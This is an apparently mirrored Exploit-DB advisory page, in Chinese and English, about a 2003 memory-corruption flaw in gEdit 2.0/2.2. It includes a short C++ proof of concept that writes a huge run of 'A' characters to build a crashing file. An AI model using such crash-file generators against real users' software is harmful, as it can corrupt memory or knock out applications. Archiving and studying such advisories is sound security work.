GEdit 2.0/2.2 – Large IOStream File Memory Corruption

GEdit 2.0/2.2 – Large IOStream File Memory Corruption

漏洞ID 1054264 漏洞类型
发布时间 2003-11-23 更新时间 2003-11-23
图片[1]-GEdit 2.0/2.2 – Large IOStream File Memory Corruption-安全小百科CVE编号 N/A
图片[2]-GEdit 2.0/2.2 – Large IOStream File Memory Corruption-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23393
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9090/info

A problem has been reported in the handling of certain file types by gEdit. Memory corruption may occur when handling files containing long strings. Because of this, it may be possible to cause memory corruption. 

/*
        simple buffer overflow generator by MegaHz [email protected]
*/
#include <iostream>
using namespace std;

int main()
{
int i;
for (i=0;i<=9999999;i++)
        {
        cout << "A";
        }
        return 0;
}

相关推荐: BB4 Big Brother CGI File Creation Vulnerability

BB4 Big Brother CGI File Creation Vulnerability 漏洞ID 1104060 漏洞类型 Input Validation Error 发布时间 2000-06-11 更新时间 2000-06-11 CVE编号 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享